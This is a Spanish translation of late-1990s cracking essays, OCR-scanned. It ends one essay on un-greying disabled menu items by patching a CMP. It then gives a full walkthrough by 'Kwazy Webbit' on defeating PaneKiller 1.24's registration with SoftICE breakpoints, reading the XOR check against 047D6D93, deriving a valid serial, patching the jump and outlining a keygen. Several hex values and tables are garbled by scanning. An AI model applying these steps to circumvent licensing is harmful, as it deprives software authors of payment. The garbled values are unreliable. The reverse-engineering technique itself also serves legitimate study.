Otra forma de usar este valioso valor es buscarlo en un archivo desensamblado. Si encuentras un CMP con una localidad de memoria y su valor, es allí donde el programa chequea si este item es seleccionado. Justo ariba puedes encontrar un salto condicional que salta esta parte si el item está desactivado. Esto significa que si quitas lo grs, el item (esto es diferente de activarlo), el programa continuará saltando el CMP y tendrás que tratar con el condicional para dejar que el programa revise el item de menú. Otra cosa que necesitarás hacer es activarlo para siempre, esto es, encontrar que lo desactiva, y parcharlo para que lo active. 
Esto también es uno de los parametros que son pasados a la API (Esta es un parametros flag). 


Qué es lo que realmente hemos logrado aquí? 
Sabemos como localizar el activador/desactivados/gris (si y no) del item de menú. También podemos se capaces de modificar los valores para activar un item del menú. NECESITAMOS hacerlo para que el programa realmente revise la selección del item. 


Por supuesto, los programadores pueden escoger cualquier cosa que quieran como condición para revisar este item. Esto puede ser una pregunta para ver si está activado o un chequeo de un + de serie, o algo de lo que se te ocurra, 
Ejemplo: 


if (EnableMenulemí.) 
ejecuta el código del item aquí. 


por otra parte, sigue su manera feliz. 
Este pequeño código en C chequeará con EnableMenultem si l item está activado o no, y si es 

(TRUE valor de retomo), el código del item será ejecutado. 

Siun valor de retomo FALSE (FALSE es un 0 , TRUE es otra cosa), el código del item no será ejecutado. Por supuesto podemos revisar un serial/* de reg en su lugar y decidir en que forma. Esa declaración 'if es lo que estamos buscando en asm o en SI, y eso es esa CMP localidad de memoria, CONSTANTE de la que hablé antes. 
Una nota: este método es un método sólido, pero puede llevarte a mucho rastear/caminar que probablemente no querrás hacer. Aún continua siendo una opción viable y una buena en esto. 


“Ahora describiré una forma ligeramente diferente de localizar esta preciosa instrucción CMP, pero primero describiré algunos trabajos internos de los programas de Windows para que sea un poco mas entendible, 


Qué pasa en el programa, en nivel de programador. 


Cuando un programador crea el programa, crea menus. Ahora, para usar esos menús, tiene que ser capaz de interpretar el mensaje WM_COMMAND que Windows le envia a su programa. 
Al principio, cuando eVella crea el menú, a cada item del menú se le asigna un identificados (como un IDABT, o lo que sea). 


En C/C++, tienes que definir el identificador en el encabezado del archivo (extension h), y asignarle un valor constante. Este valor es transferido al programa cuando Windows detecta la detección de un item del menú. Transfiere el valor en el WM_COMMAND wParam low=word y lo que el realmente hace el programa es extraer ese numero. El programa compara este número (podría ser de un item de cualquier programa corriendo), con una de las constantes que tiene para los items del menú. 
Si casan, eso significa que el usuario seleccionó un item perteneciente al programa, y el programa tiene que ejecutar el código para la opción del item. 
En ASM esta comparación es el CMP [localidad de memoria]. CONST 


Despues de activar el item, tenemos que fijar y encontrarla instrucción CMP. 
Y aquí está el método excelentemente hecho que encontré: 


Localizando el CMP importante que puede interferir con el menú 


Okas, cuando el programa obtiene un WM_COMMAND revisa el valor wParam low=word value con todas sus constantes. Hace esto en un tipo especial de procedimiento que está definido como procedimiento CALLBACK. 
Esto no nos concierne, excepto por la forma en que el CPU alcanza este procedimiento especial. Bien, hice algunas pruebas y encontre que cuando hay un mensaje WM_COMMAND, una función llamada WinProc32w está siendo llamada (o algo similar) 


Al principio rastree un procedimiento caminando un monton para ver que resulta ingresando en el procedimiento de nuestro objetivo, y despues de algun trabajo, identiiqué la localidad sospechosa. 
Encontré que el OS Windows ejecuta el siguiente código: 


CALL [KERNEL321K32Thk1632Prolog] 
CALL [...] ¿esto lleva a nuestro precioso procedimiento 
CALL [KERNEL321K32ThK1632Epilog] 


Okas, primero, no trates de buscar estas APIS, porque no son APIs Win32, La API es 
Application Programming Interface (Aplicación de Interfase de Programación), pero esta es una función interna de Win, como HMEMCPY. 


De cualquier forma, lo que hacemos es obtener el manejador de ventana del comando HWND, luego fijar un BP en el mensaje WM_COMMAND, justo como describí antes 
BP hwnd WM_COMMAND. 
Donde nwnd es el manejador de ventana que encontramos. Nota que algunas aplicaciones pueden abrir muchas ventanas. Ejemplos de este caso son todos los productos MicroSoft (casí), una evidencia clara de su naturaleza sobreinflada, esos punks.. 


En semejante caso, sería dificil encontrar la ventana correcta, un pco de zen! es requerido. hehe 
Solo practica este método. 


Okas, de cualquier forma, continuemos. Escogemos acivar el item del menú (ya lo ctivamos, recuerdas? y tompemos e el WM_COMMAND. Toma nota del valor wParam, porque esta es la constante enla insucción CMP que tratamos de encontrar. 
Justo despues de romper, ja un BP en la función de ariba 

BPX K32bK1632prolog 

Continua la ejecución, y aterrzaremos en esta función. haz un P RET (F12 para mi). y regresaremos a algo quese ve como el snippet de código de ariba. 

RASTREA en la siguiente llamada, y cualqier ora llamado, HASTA que alcances el espacio de dirección del programa. Lo sabrás porque s mira las direcciones, casaan aquellas que son listadas en el RVA y la Tabla Bas del programa, y puedes obtener la info usando el comando de modulo en SL 
Oro buen indicador es que supuestamente no verás Alguna cadena sobre la ventana de código. Si ese es el cao, probablemente estás enel lugar coreco. 


Ahora, Rastrea a través del código, cuidadosamente busca el CMP, y deberías verlo despues de un while. 
Cuando lo encuentres, puedes fijar un BP .en él para referencia y el uso del CODE ON para obtener los bytes que necesitas parchar. 


Nota que este método trabaja siempre, pero mientras mas ventanas tiene la aplicación (mas meoria toma también), lo díficil es encontrar este CMP. Y por supuesto mientras mas comandos en el menú, mas CMPs también, así que llama la decisión. 
Despues de esto, dicho y hecho, pueden haber otras formas, pero normalmente usaremos EnableMenultem y sus equivalentes. 


Espero que goces y/o aprendas de este ensayo. Cualquier pregunta puedes dirigirmela a mi ICO: 
5178515 


Lord Soth 


BIENVENIDO A 
"CRACKEANDO COMO KWAZY" 


Kwazy Webbit vs. MaD doG 


Autor [Kwazy Webbit 

Traductor [NG]oLe[E]" 

Grupo [DREAD 

Asunto (AKA 'victim') [PaneKiller 1.24 de MaD doG (cualquier 1.2x debería trabajar, pienso) 


Softlce 3.xx 
Un visor de texto (notepad lo hará) 


Win32 API programming reference (win32.hlp) 


Encuentrala usando cualquier buscador. 
También podrias preguntarle a cualquier programador por el. (en IRC por ejemplo) 


Herramientas requeridas 


[Tu compilador favorito (solo para el capítulo 3) 


[WDasm 8.9x (solo para capitulos avanzados) 


[Un hex-editor (solo para capitulos avanzados) 


Fecha de Escritura [Mayo 31, 1999 


Hola amigos! Me llaman Kwazy Webbit. Soy un nuevo miembro del Dutch cracking group DREAD. 

En este ensayo espero ayudarte a iniciarte en la Ingenieria Inversa, lo que basicamente significa que quiero hacer mas que decirte como crackear cualquier programa allá afuera. Trataré de tomarte a través del proceso de revertir este programa un 
paso a la vez, al contrario de otros crackers que solo escriben lo que hacen, y olvidan explicar POR QUÉ lo hacen. 

También fuí un principiante hace mucho, y he leído millones de ensayos, que son mas de los supuestamente buenos. Bien, puedo decirte, la mayoria de ellos eran mucho para ser entendidos por un newbie, y no enseñaban nada nada nuevo a los 
crackers avanzados. Basicamente, eran inutiles para ambos lados. 

En este ensayo, estoy asumiendo que tienes menos experiencia con Softlce (Si no tienes ninguna, te diré que teclas presionar para cada cosa que deberías hacer). 

Te sugiero usar una resolución de 800*600 y un browser maximizado para ver este texto, para que todo se vea bien. Lo mejor sería imprimirlo, porque no serás capaz de leerlo en la pantalla cuando estes usando Softlce. 


AHORA, SIENTENSE NIÑOS, LA CLASE ESTÁ A PUNTO DE EMPEZAR ! 


COMO OBTIENE NUESTRA INFO 


Iniciemos PaneKiller si aún no está corriendo, y verás como lo registramos. Tiene su propio popup menu, y podemos ver una opción llamada "Unlock with registration code". Me suena bien. Revisemosla. Tiene campos de texto donde debemos 


ingresar nuestro nombre, compania y código de registro. Okas, tiempo de crackear : 


Lo primero que notamos fue que el programa obtiene nuestra info a través de campos de texto normales (como casí todo programa Win95). 


"Como podemos usar eso para nuestro beneficio?", Dices? Bien, un programa tiene que llamar una función para obtener esta info de las textboxes. Y ya que esto representa un monton de trabajo para programar un procedimiento para eso, Windows 
95 tiene las funciones necesarias listas para hacerlo, salvandole muchos problemas al programador. 


El hecho que todos los programadores puedan usar las mismas funciones es también la gran debilidad, al hablar de esquemas de seguridad. Todos los programadores saben que son estas funciones, y también lo saben todos los crackers (seríamos 
nosotros :). 
Las funciones usadas comunmente en Windows 95 son: 


GetWindowTextA 


Definición en la referencia API de los programadores: 
La función GetWindowTextA copia el texto de la ventana especificada por la barra de título (si tiene) en un buffer. Si la ventana especificada es un control, el 
texto del control es copiado. 


GetDlgltemTextA 


Definición en la referencia API de los programadores: 

La función GetDlgltemText recupera el título o texto asociado con un control en un cuadro de dialogo. 

Si no eres un programador, deberás estar preguntandote que es un cuadro de dialogo. Bien, basicamente es lo mismo que una ventana normal, pero 
internamente trabaja diferente, lo que significa que requiere una funcion diferente. 


GetDlgltem!Int 


Definición en la referencia API de los programadores: 
La función GetDlgltemint traduce el texto de un control especificado en un cuadro de dialgo a su valor entero. Basicamente esto es lo mismo que 
GetDlgltemTextA, pero esta función directamente retorna un numero (un número decimal) sin tener que traducirlo de una cadena. 


Tratemos de fijar estos breakpoints en Softlce: 'bpx GetDlgltemTextA', 'bpx GetWindowTextA!, 'bpx GetDlgltemInt' (muchos programas usan estos para los + de serie) y agrega otro si sientes que hay alguna importante perdiada. En caso que 
todavia no sepas: 'fijar un breakpoint' significa que desde ahora en adelante, cada vez que la función especificada es usada (llamada) softice para todo lo que ocurre y aparece en tu pantalla. 


Ingresemos nuestra info (nombre y compania), y un + de serie ficticio. Presionamos el botón 'OK', y Softlce aparecerá. (k3w1, uno de nuestros breakpoints funcionó. Eso es un buen inicio!) Vemos en la ventana de Softlce y vemos que 
GetDlgltemTextA es la función que fue llamada. Ahora estamos en una instruccion despues que fue llamada la función. Eso significa que ahora estamos DENTRO de la función GetDlgltemTextA. Podemos presionar para salir de la función, y 
regresar al código de nuestro programa. 

Allí podemos ver la llamada que el programa hizo a GetDlgltemTextA, en la instucción antes de nuestra posición actual. Primero, busquemos que parametros usa esa función en nuestra Win32 APT reference. 


La referencia dice GetDlgltemTextA usa cuatro parametros: 


hDlg El manejador del cuadro de Dialogo. Basicamente es la versión del cuadro de dialogo hWnd, el cual es el manejador de una ventana de 
programa, usada por mucho (si no la mayoria) de funciones windows. 
(No nos sirve mucho ahora) 


nIDDIgltem El ID del 'control' de donde debería obtener el texto. Un control es justo una parte del cuadro de Dialogo, como un campo de texto o un 
boton, y son referidos por su control unico ID. 
(No nos sirve mucho ahora) 


IpString La dirección de memoria donde la función deberia poner la cadena que obtiene. Ahora esto es muy importante! de esta forma podemos 
ver donde es que el programa pone nuestro nombre, compania y el serial. 


nMaxCount El número máximo de caracteres que obtendrá la función. 
(No nos sirve mucho ahora) 


Windows usa el método PUSH-ing (empujar) cosas en la pila cuando llama una función. Algo muy importante para recordar es que en ASM, el último parametro es empujado primero. No explicaré por qué, porque sería muy largo. Si quieres 
saberlo, te sugeriría aprender ASM. 


Así que lo que realmente ves en ASM es esto: 


PUSH nMaxCount 
PUSH IpString 
PUSH nIDDIgltem 
PUSH hDlg 


Uno de los signos de este método de usar la pila es la constante manoseando con los registros ESP y EBP en el inicio y final de una función. Tambien, siempre habrán mas justo despues de la llamada a la función. Todo esto es totalmente 
insignificante para nosotros los revertidores, y puede ser ignorado. 

Vemos 2 llamadas mas a GetDlgltemTextA, y deberían estar porque hay 3 campos de info. Esto significa que Softlce aparecerá 2 veces mas para las otras llamadas. Solo camina en ellas, y F11 para salir de ellas, como hiciste para la primera. Ahora 
deberías estar despues de las llamadas, y (lo que probablemente demostrará ser) el inicio de la protección. El programa justo ha acabado de obtener la info que ingresaste, así que chequemos ahora donde la puso. 

Veamos que dirección es empujada a las funciones GetDlgltemTextA como IpString: 


CALL 1 : [EBP-50] 
CALL 2 : [EBP-40] 
CALL 3 : [EBP-D0] 


No les permitas engañarte, el orden en el cual el código obtiene la info no tiene que ser el mismo en que aparecen los campos de texto. Revisemos que dirección tiene que valor. 
Para hacerlo, escribe 'd ebp-50', 'd ebp-40' y 'd ebp-DO". 
Descubriras lo siguiente: 


[EBP-50] = +f de Serie (tambien referido como s/n o código de registro (reg code)) 
[EBP-40] = Nombre 
[EBP-DO] = nombre de la compania 


Es bueno saberlo! 


LA PROTECCION 


Tratemos y consigamos una idea general acerca de como trabaja la protección antes de entrar en detalles exactos. Muchos crackers no hacen esto, y a menudo nos perderemos en mucho código, eso demostrará ser totalmente irrelevante despues. 
Ahora, estamos después de que el programa obtuvo nuestra info. Aquí vemos una función ser llamada. Es una función interna (que simplemente significa que no es una llamada APT), así no sabemos (aún) exactamente que hace. Podemos seguir 
revisando los parametros que está recibiendo solo viendo que fue empujado justo antes de la llamado. 

Solo hay una variable siendo empujada, [EBP-50] que es nuestro reg code. hmmm... bien, no puede ser el chequeo de registro, porque necesitaria (probablemente) nuestro nombre / nombre de compania y tampoco es empujado aquí. Solo saltemos 
esta función por ahora. 


Lo siguiente es otra llamada a función. Sus parametros son nuestro s/n, nuestro nombre, y otra variable, [EBP+08] 

Soy naturalmente curioso, e inmediatamente quiero saber que es esa variable. La curiosidad en en mi humilde opinion la exigencia mas importante para llegar a ser un buen cracker. Porque si no revisas todo y quieres apresurar las cosas, usualmente 
fallaras. Es importante tratar de entender que está pasando. Si puedes hacerlo, puedes tomar cualquier esquema de protección. 

Bien, todo está bien.. pero como encontramos que es [EBP+08]? Okas, primero revisaremos que está en EBP-08 ('d ebp-8") hmmm... Bien, obviamente no es una cadena. Así que probablemente es un número. Podemos ver que es un valor DWORD 
(el cual es 4 bytes = 32 bits), porque [EBP+08] está siendo puesto en ECX antes de ser empujado, y ECX es un registro de 32-bit. 

Verás una figura hexadecimal allí. En mi caso, decia 'FCO70000' Variables son puestas en memoria invertidas, un byte a la vez. Confundido? Bien, dejame ayudarte. Un byte son 2 nibbles. (nibbles son los que van de 0-F y son usados para numeros 
hexadecimales). En otras palabras, tienes que tomar esos números en la data window 2 nibbles (un byte) a la vez. En mi caso: 'FC 07 00 00". Se está aclarando? bien. 

Son puestos en memoria invertidos, así el numero real sería '00 00 07 FC'. 

Hmmm, ahora cuanto es eso? preguntemosle a Softlce : '? 7FC' (usa tu figura en lugar de la mia) Softlce te dará el número en hex, decimal y ASCII. El número continua sin decirnos nada! Maldición! 

Bien, hay una cosa mas que podemos hacer: revisar si la variable ha sido usada antes. Quiza eso pueda ayudarnos. SÍ! ha sido usada en cada una de las llamadas a GetDlgltemTextA. 

Siempre es la última variable en ser empujada, eso lo hace ...(fanfarrias)... el hDlg! 

En este caso demostró ser insignificante para el crackeo de este programa, pero siempre es una buena idea revisar esas 'misteriosas variables', aún si solo es para yudarte a entender mejor el programa. 


Bien, ahora entendemos todos los parametros dados a la función, nuestro nombre, compania, reg code y el manejador de ventana Wow, esto se ve como una función importante, requiriendo toda esa info! Esto probablemente resulte ser la función 
donde es fijado el centro del esquema de protección. Sin embargo, primero veremos un poco mas arriba. Recuerda, solo estamos tratando de obtener una idea general en este punto. Veremos dentro de la función(es) despues. Después de llamada la 
función (y limpiada) hay una prueba siendo hecha, para revisar si EAX es o no cero. Entonces hay una instrucción JZ, en otras palabras: si EAX es cero, salta a la dirección dada, de otra forma, se mantienen yendo a donde es. Simple lógica debería 
hacerte comprender que el valor de EAX probablemente será el resultado del chequeo de registro. (BUENO/MALO) 

Veamos que hace cada pedazos de código, así podemos revisar si esa suposición fue correcta o no. 


Asumamos por ahora que EAX fue 0 => TEST EAX,EAX => la flag cero es fijada => el JZ (Salta si es Cero'- instruccion) decide saltar a 403102 => una vez allí, inmediatamente comienza a preparar una llamada de la función MessageBoxA. 
Busquemosla en nuesta APT reference. Encontramos que tiene los siguientes parametros: 


hWnd => El manejador de ventana (ver antes en este ensayo para mas detalles) 
IpText => La dirección del texto a ser desplegado en la messagebox 
IpCaption => La dirección del texto a ser desplegado en la barra de título de la messagebox 


uType => El estilo de la messagebox 


(recuerda los parametros son empujados en orden inverso) 


Echemos una mirada al texto desplegado en la messagebox. Eso nos debería dar una buena idea de por qué está siendo desplegado. Veamos, la tercer variable siendo empujada fue 00422194 así debería ser la dirección del texto. hacemos un 'd 
00422194", y miramos la vnetan de memoria. Vemos: "The registration code you have entered is incorrect, Please try again." 
Hmmn, así esta es una messagebox para cuando has ingresado el código incorrecto. 


Ahora, para las otras posibilidades: 

EAX no fue 0 => TEST EAX,EAX => la flag cero es anulada => el JZ decide no saltar => primero llama alguna función con parametros como nuestro nombre, compania y s/n. Después, nos muestra una MessageBox. 
Veamos que nos podría decir esto: 'd 00422188". Dice: "Thank You!". 

Eso suena como algo que diría cuando ingresas un s/n correcto. 


Aparentemente, EAX no debería ser cero cuando alcanzamos la instrucción TEST EAX,EAX. 


Okas, eso es todo para el primer reconocimiento global (Amo el lenguaje militar :). 
Echemos un vistazo a lo que sabemos que hace el programa: 


[Llama a GetDlgltemTextA (3x) Para obtener nuestro codigo, nombre y compania. (en ese orden) 


[Llama a Function1 Continua inidentificada, hace algo con nuestro S/N, pero es un candidato incierto para ser nuestro esquema de protección. 


Llama a Function2 Esta usa nuestro nombre, compania, Y nuestro serial. Parece ser la mejor suposición para encontrar la protección. 


Yes => [Muestra la MessageBox: "The registration code you have entered is incorrect, Please try again." 


Prueba para ver si Function2 retornó 
cero. No => 


Hace algo con nuestro nombre/compania/serial, 
entonces muestra una MessageBox: "Thank You!". 


CRACKEANDOLO 
Hay 3 formas para crackear este programa (y la mayoria de los otros programas): 
1- La MALA forma: usando Softlce para forzar al programa a aceptar nuestro mal S/N como si fuera correcto, AKA 'parcheando". 
2- La BUENA forma: determinando/calculando el s/n correcto para tu nombre. 
3- La forma PROFESIONAL: haciendo un 'key generator". Si no sabes como programar, puedes saltar este método. 


Tambien iré en 2 imponentes variaciones de este método, ambos solo para programadores en ASM: 


e La forma DREAD 


e Estilo Kwazy Webbit 


Revisaré los 3 métodos aquí. 


1- La MALA forma 


En la prueba, EAX no debería ser Cero, así algunos podran pensar que una forma fácil de parchear el programa sería: 


- justo antes de la instrucción TEST podríamos cambiar el valor de EAX a un valor que no es cero. 
(Aquí, encontré algo interesante: EAX solo puede ser00000001 (buen s/n) o 00000000 (mal s/n), de otra forma, windows colapsará!! no habia forma de saber esto sin probar (bien, no sin estudiar todo el código primero), así que considerame tu 
conejillo de india :) 


- justo despues del TEST podriamos desactivar la flag cero, así continuariamos sin saltar aunque EAX sea cero en el TEST. 
(En softice, usa el mouse para hacer click en la Z en la esquina superior derecha de la ventana, debería estar resaltada. Presiona Insert para cambiarla a on y off.) 


- podríamos cambiar el JZ 00403102 en JNZ 00403102 (salta si NO es cero) lo cual significaría que EAX debera ser cero en el TEST. Ahora esto no será muy difícil de hacer, o sí? :) 
He probado todas estas, y de verdad puedo decir que ninguno trabaja, porque el programa revisa si el s/n es correcto cada vez que comienza. Por supuesto, podemos tratar de encontrar esa parte del programa y parchear el programa permanentemente 


para asegurarnos que podemos seguir crackeandolo, pero, por qué? no deberíamos simplemente obtener el serial correcto, e ingresarlo? Probablemente es mas (o quiza menos) trabajo, y sin el riesgo de dañar una parte del programa, que necesitaras 
despues. Entonces, tratemos de hacerlos: 


2- La BUENA forma 


Ahora vamos a ver como el programa chequea si el s/n que ingresaste es correcto. (también conocido como el 'esquema de protección"). Para hacerlo, vamos a ver las 2 funciones. 
La primer función: 


Caminemos simplemente (F10) a través del código hasta que alcancemos la llamada a la primer función. Echaremos un vistazo dentro de ella (F8). Vemos que el primer caracter (byte) de nuestro s/n es puesto en ECX. Luego, revisa si es un signo 
NULL (00 en nibbles). Signos Null son usados para indicar el final de una cadena normal (es MUY importante que lo sepas!). Eso es por qué se llaman cadenas terminadas en cero. Luego revisa si es un espacio, un '-' o un '.' Asumamos por un 
momento que esos caracteres no son requeridos. Esto podría salvarnos muchos problemas tratando de figurarnos que hace exactamente cuando cada caracter es encontrado. 

(No dejemos que la curiosidad vaya muy lejos ahora, no queremos estar aquí por días haciendo algo que demostrará ser inutil :) Despues de todo, si demostramos que es incorrecto, siempre podemos regresar y segur encontrando que hacer. 


Cuando un número normal fue ingresado como as s/n, la función no hace nada. Solo revisa cada caracter para los '', '-' y '.' y se mueve al siguiente cuando es hecho. Aparentemente, esta función solo revisa caracteres extraños en nuestro reg code. 
Caminemos fuera de esta función (F11) y vamos hacia la segunda función (usando F10). 


La segunda función: 


Al principio, esta parecia ser el esquema de protección, y ahora es la unica posibilidad que queda mucho para serlo, así que parece que estabamos en lo correcto. Caminemos dentro.(F8) 

Primero, vemos que una función es llamada con 3 parametros. Veamos que son. El primero es una dirección puesta en EAX. Cuando descargamos esa dirección (d eax') vemos que hay en esa dirección, no hay nada que podamos reconocer. Hmm, 
extraño. Pero sigamos por ahora. El siguiente parametro siendo empujado es 0422078h. Ahora esto se ve como una dirección también. Descarguemola. De nuevo, somos dejados con algo desconocido. No me gusta este pedazo, pero sigamos por 
ahora, podemos encontrar despues que es esto. El tercero y ultima variable empujada es también una dirección. Ahora, veamos si esta puede ser identificada. Despues que el código pone la dirección en ECX, escribe 'd ecx' para ver a que apunta. 
AHA! Ahora esto nos parece familiar. Es nuestro reg code. 

Entonces, el único parametro conocido que recibe (para nosotros), es nuestro s/n. Como mencione antes, el reg code correcto es probablemente dependiente del nombre y/o compania que ingresaste, así que probablemente esto no es el esquema de 
protección. Entonces, que es esto? Que le hace a nuestro s/n? Calmate, y trata de figurartelo. Una vista rapida dentro de la función (F8) no nos dice mucho, porque otra función también es llamada, haciendo las cosas difíciles. Caminemos fuero de la 
función, y veamos que sería lo siguiente. Justo despues de la llamada a la función, vemos una llamada a MessageBoxA. Veamos que diría: 'd 42207C'. La ventana de datos dice: "The registration code is not in the correct format". OKAS! Entonces, 
ahora si es seguro asumir, que la función solo revisa si el reg code está en el formato correcto o no, lo que probablemente significa que sin un caracter raro o algo así. Okas, nuestro código está en el formato correcto, así que solo saltamos el 
messagebox pasado, y seguimos, profundo en la protección. 


Siguiente, una función es llamado con nuestro nombre como parametro. Si miramos adelante, vemos la misma función exacta siendo llamada para nuestro 'company name' como su parametro. Despues de cada llamada, EAX es almacenado en 
memoria. Pero espera, que es EAX?! Bueno, despues de una llamada a una función, seimpre contiene el valor retornado. Los programadores (deberian) saber exactamente lo que quiero decir con eso. El resto de uds. puedo tomarlo solo de mi parte, 
esa función siempre retorna un valor, y ese valor siempre es puesto en EAXantes de retornarlo. Sabiendo esto, podemos ver que los valores retornados de las 2 llamadas a esa función son almacenados en [EBP-08] y [EBP-0C] respectivamente. 
Caminemos en la funcón, y veamos que hay en esas 2 direcciones. Hmm, 2 número que no significan nada para me. Pero que probablemente son importantes, porque son usados de nuevo despuesito. 


Ahora viente la parte mas importante de la proctección: 


(1) MOV EAX, [EBP-04] 
(2) XOR EAX, [EBP-08] 


(3) CMP EAX, 047D6D93 
(4) JNZ 00402E74 
(5) MOV EAX, 00000001 
(6) JMP 00402E74 


- (1) Hey, que hay en [EBP-04]? Caminemos al final de la lines (F10) y veamos que fue puesto en EAX. Okas, ese es nuestro s/n. Ahora viene la prueba para ver si realmente estás poniendo atención, hay algo extraño ocurriendo con nuestro s/n! 
'de ninguna forma, se ve bien aquí..' te escuche decir. Cierto, pero esa es la parte extraña! No deberia verse normal. No se despliega en decimal o ASCII. Es en notación hexadecimal. No debe verse como tu serial del todo. Aparentemente, 
PaneKiller asume el código serial como un numero hex, en lugar de uno decimal. En otras palabras, podemos usar un numero hex como nuestro reg code, así podemos usar 0-F en lugar de 'solo' 0-9. Info muy útil.. Si no lo notaste antes, no te 
preocupes, tampoco yo lo hice. :) De cualquier manera, ahora EAX contiene nuestro reg code. 


- (2) En esta línea nuestro reg code es XOR-ado con nuestro número que fue derivado de nuestro nombre (recuerda, de la función anterior?). En caso que no sepas que es XOR, te daré una muy corta explicación. XOR es la abreviación de 
'eXclusive OR' (O exclusivo). 
Qué hace: 
Toma un bit de cada variable (eso significa que ahora tiene 2 bits) 
Retorna 1 si son diferentes (uno de ellos es O y el otro es 1) 
Retorna 0 si son iguales (ambos son 0, o ambos son 1) 
Pone el resultado en la posición apropiada en la variable 1 
Va al siguiente bit y comienza de nuevo 


Quiza esta 'tabla de verdad' nos ayudará a aclararlo un poco: 


XOR Tabla de verdad 


VAR 2 


Lo tienes? eso espero. Entonces, en este caso el resultado es almacenado en EAX (que es la variable 1) 


- (3) Ahora revisa si el resultado del XOR es 047D6D93 h. 


- (4) Si no lo es, salta y ahora estamos en otro intento (una segunda oportunidad) para ver si obtendrá el resultado correcto usando nuestro company name en la linea (2) y un número diferente en la línea (3). Cuando fallamos ese, salta a la línea 
donde EAX es XOR-ado por si mismo. (todos los bits en EAX son, por supuesto, los mismo que en EAX, así todos los bits seran fijados en cero. Basicamente es lo mismo que MOV EAX, 0) Entonces la función retorna EAX siendo cero. 
Como vimos antes. eso significa: Serial incorrecto. No queremos eso. Si lo es, el salto no es hecho, y 


- (5) MOV EAX, 00000001 es ejecutado. En otras palabras: EAX ahora es 1 (FNO-CERO!) 


- (6) Luego continua saltando al final de la función, esta vez saltando la instrucción XOR EAX, EAX y retornando EAX =! 0. SÍ! nuestro registro es exitoso. 


La belleza de la instrucción XOR es que es tan facil de revertir. 
Lo que estoy diciendo es que despues: 


A=B XOR C (AB y C son variables) 
y tienes 2 de las 3 variables, puedes obtener la tercera XOR-eando las 2 que tienes. Así, después de la instrucción XOR previa, 


B=A XOR C 
C=A XOR B 


REALMENTE?! seguro, solo revisa con la tabla de verdad de arriba. Traza tu propia conclusión. 


Entonces, como usamos esto aquí? Bueno, sabes que despues que la instrucción XOR, EAX debería ser 047D6D93 h (en el ejemplo de arriba, sería A, porque el resultado es almacenado en variable1, recuerdas?) También, sabemos el código que fue 


derivado de nuestro nombre. ('d ebp-8', y recuerda SIEMPRE que los numeros son almacenados en orden inverso en memoria. En mi caso, en memoria era EB A6 DS D2 (derivado de mi nombre 'Kwazy Webbit'), entonces mi 'name-code' sería 
D2D5AG6EB h) Llamemos B a esto en nuestro ejemplo. Ahora, podemos usar el C=A XOR B para obtener C. C sería entonces [EBP-04], nuestro s/n! K3W1! 

Como hice eso? Bueno hay varias formas, estoy seguro que hay calculadoras especiales disponibles en la web, pero no tengo ninguna personalmente. También podrías hacer la tuya, si eres un programador (recuerda que necesitaras un numero 
hexadecimal para esto). Siempre hago esta operación en un simple pedazo de papel. Primero escribes el numero binario para los 2 numeros hex. (No es tan dificil como parece, puedes trasladar un nibble a la vez, usando esta tabla: 


| Hexadecimal Binario 
| 0 0000 
[o 1] 0001 

| 2 0010 

| 3 0011 
Po. 0100 

| 5 0101 

| 6 0110 
PT. > 0111 

| 8 1000 

| 9 1001 
Po A 1010 
[o —B  ] 1011 

| C 1100 

| D 1101 
[o —— E | mo] 
| F 1111 


Luego solo usa La Tabla de Verdad XOR para hacer el resto. 
Para convertir el resultado de nuevo a hex, solo usa la tabla hex/binario de nuevo. 
Estoy seguro que una calculadora sería mas rapida, pero no he buscado una aún. 


Ejemplo: 
D2D5AG6EB h era mi name-code para Kwazy Webbit 


Mi s/n debería ser: 047D6D93 XOR D2D5A6EB 


047D6D93 => 0000 0100 0111 1101 0110 1101 1001 0011 
D2D5A6EB => 1101 0010 1101 0101 1010 0110 1110 1011 
XOR 


S/N => 1101 0110 1010 1000 1100 1011 0111 1000 


S/N = D6ASCB78 h 


Desde que descubrimos que el s/n está en hex, simplemente podemos dejarlo en esta forma. no tenemos que convertirlo a decimal como otros seriales. Solo trata de ingresar 'Kwazy Webbit' como nombre e ingresa este s/n (o si ya hiciste uno, por 
todos los medios, usa el tuyo!) Debería darte el mensaje que sabemos que va a venir: "Thank You!" 
La siguiente vez que inicies PaneKiller, será la versión registrada. Y administramos esto para hacerlo en la forma que debia ser hecho, sin forzar brutalmente al programa a aceptar nuestro serial incorrecto, pero si obteniendo el correcto en su lugar. 


3- La forma PROFESIONAL 


Como mencioné antes, haremos un 'keygen' aquí. Es la abreviatura para key generator, un programa que te dejara ingresar un nombre/o compania, y te dará el s/n que le corresponde. Para hacer esto, obviamente tienes que saber programar. Estoy 


asumiendo que sabes como hacerlo, desde este momente. Ahora, dejaré el código del resto del programa para ti (la forma en que se verá la ventana, hacer un WndProc, etc.), solo asegurate que tienes una ventana con 2 campos de texto. 
El primer campo de texto es para que ingreses el nombre. 

El segundo es para que el programa ponga el reg code calculado. 

El botón para iniciar el cálculo. 


Esquematicamente el programa haría esto: 

1- Botón presionado 

2- Obtener el nombre ingresado del campo de texto 1 y ponerlo en memoria (una variable) 

3- Usar el nombre para calcular el código que le pertenece (justo como lo hace Painkiller) y almacenarlo en una variable 
4- S/N XOR 047D6D93 (recuerdas?), almacenar el resultado (ese es el s/n) 

5- Trasladar el s/n con la cadena que le corresponde 


6- Poner la cadena en el campo de texto 2 


La parte mas importante, obviamente es trasladar el nombre al nombre-código. 

Algo como esto puede ser difícil, pero cuando pensamos acerca de esto por un segundo, es fácil: debemos hacer lo mismo que PaneKiller usa para la traducción de nombre a cadena-nombre. Echemos una vista donde fue eso otra vez. La función que 
queremos imitar está localizada en 04031AAh. Ahora veamos dentro (F8). Bien, no hay otras funciones siendo llamadas y no hay saltos siendo hechos a un lugar fuera de esta función. (04013AA a la instrucción RET) Eso mantendrá las cosas 
buenas y simples. Podemos copiar el código dentro de la función y ponerlo en lo nuestro (sorry, no hay copyézpaste en Softlce ;). "Pero Espera! Eso no está en mi lenguage de programación', dices? bien, yo programo por mi mismo en ASM, pero se 
me ha dicho que puede hacerse muy facil en C/C++ poniendo el código en un bloque 'asm([ ... )'. Para otros lenguages, sugiero que revises el archivo de ayuda para info. 

Ahora no hay mas problema con ese código: los [EBP-08], [EBP-04], etc. Esos son solo variables locales. Pero de que tipo? Bueno, puedes ver que [EBP-04] y [EBP-08] son variables DWORD, debido a las instrucciones en el inicio de la función: 


MOV DWORD PTR[EBP-04], 00000000 
MOV DWORD PTR[EBP-08], 00000000 


La versión sin compilar podría verse así: 


MOV DwordVar1,0 
MOV DwordVar2,0 


Lo tienes? 


